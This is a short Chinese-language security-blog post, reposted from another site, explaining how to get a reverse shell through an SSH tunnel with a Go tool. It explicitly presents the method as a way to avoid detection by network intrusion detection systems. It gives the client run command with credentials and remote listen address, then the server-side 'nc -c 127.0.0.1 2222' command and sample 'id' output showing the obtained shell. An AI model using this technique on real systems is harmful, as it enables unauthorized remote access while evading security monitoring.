1. 首页
  2. 网络安全技术

使用SSH隧道进行SHELL反弹

使用SSH隧道进行SHELL反弹

使用ssh隧道的好处:

  1. SSH 会自动加密和解密所有 SSH 客户端与服务端之间的网络数据,同时能够将其他 TCP 端口的网络数据通过 SSH 链接来转发,并且自动提供了相应的加密及解密服务,这样能够避免被NIDS检测到;
  2. SSH基本上在每个机器上面存在,不需要额外的条件;

运行

在本地运行: go run main.go -a ‘127.0.0.1:2222’ -u user -i id_remote_rsa IP.OF.REMOTE.MACHINE 正常运行就会如下的结果:

go run main.go -a ‘127.0.0.1:2222’ -u USERNAME -p PASSWORD IP.OF.REMOTE.MACHINE
[ info ] listening for connections on IP.OF.REMOTE.MACHINE:22 (remote listen address: 127.0.0.1:2222)

此时,在服务器上面运行(IP.OF.REMOTE.MACHINE)运行 nc 127.0.0.1 2222 即可得到反弹shell.

服务器端
$ nc -c 127.0.0.1 2222
$ id
uid=1000(spoock) gid=1000(spoock) groups=1000(spoock),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)

客户端
$ go run main.go -a ‘127.0.0.1:2222’ -u USERNAME -p PASSWORD IP.OF.REMOTE.MACHINE
[ info ] listening for connections on IP.OF.REMOTE.MACHINE:22 (remote listen address: 127.0.0.1:2222)
[ info ] accepted connection from: 127.0.0.1:33016

文章来源:【安全时代】 原文链接:https://www.agesec.com/article/5863.html

安全时代全部内容仅适用于网络安全技术爱好者学习研究,学习中请遵循国家相关法律法规。

安全时代全部数据来源互联网,不代表安全时代立场,如侵犯您权益可邮箱联系我们,详情:版权纠纷

发表评论

电子邮件地址不会被公开。 必填项已用*标注